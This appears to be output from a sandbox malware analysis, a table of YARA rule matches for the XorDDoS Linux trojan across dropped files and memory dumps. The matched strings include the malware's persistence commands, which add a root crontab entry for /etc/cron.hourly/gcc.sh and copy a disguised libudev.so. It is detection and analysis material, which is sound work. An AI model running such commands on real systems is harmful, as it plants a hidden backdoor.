/usr/bin/ujuhiugmmi	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ujuhiugmmi	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ujuhiugmmi	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/ujuhiugmmi	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/zkleyiegjf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/axppigwavk	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/hwcijqdbza	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/hwcijqdbza	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/hwcijqdbza	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/hwcijqdbza	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/hwcijqdbza	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/jflhtagbsg	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zkleyiegjf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/zkleyiegjf	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/sanzuhhixf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/sanzuhhixf	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/xocmdvejxu	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/xocmdvejxu	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/xocmdvejxu	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/xocmdvejxu	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/xocmdvejxu	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/xocmdvejxu	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/xocmdvejxu	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/jflhtagbsg	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/jflhtagbsg	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/axppigwavk	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/bin/zkleyiegjf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/zkleyiegjf	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/zkleyiegjf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/zkleyiegjf	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/zkleyiegjf	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/axppigwavk	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/axppigwavk	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/axppigwavk	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/axppigwavk	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/axppigwavk	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/wjnxqdxblo	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/sanzuhhixf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/sanzuhhixf	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/sanzuhhixf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/sanzuhhixf	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/sanzuhhixf	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/jflhtagbsg	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/jflhtagbsg	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/jflhtagbsg	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/jflhtagbsg	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/jflhtagbsg	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/wjnxqdxblo	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/lib/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wjnxqdxblo	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wjnxqdxblo	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/lib/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/lib/libudev.so	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b044:$st0: BB2FA36AAA9541F0 0x6b054:$st0: BB2FA36AAA9541F0 0x6b084:$st0: BB2FA36AAA9541F0 0x6b094:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b29c:$st0: BB2FA36AAA9541F0 0x6b2ac:$st0: BB2FA36AAA9541F0 0x6b2dc:$st0: BB2FA36AAA9541F0 0x6b2ec:$st0: BB2FA36AAA9541F0
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/lib/libudev.so	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/lib/libudev.so	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/lib/libudev.so	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/wjnxqdxblo	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/wjnxqdxblo	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/wjnxqdxblo	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
Click to see the 106 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6235.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6235.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6235.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6235.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6235.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6235.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6235.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
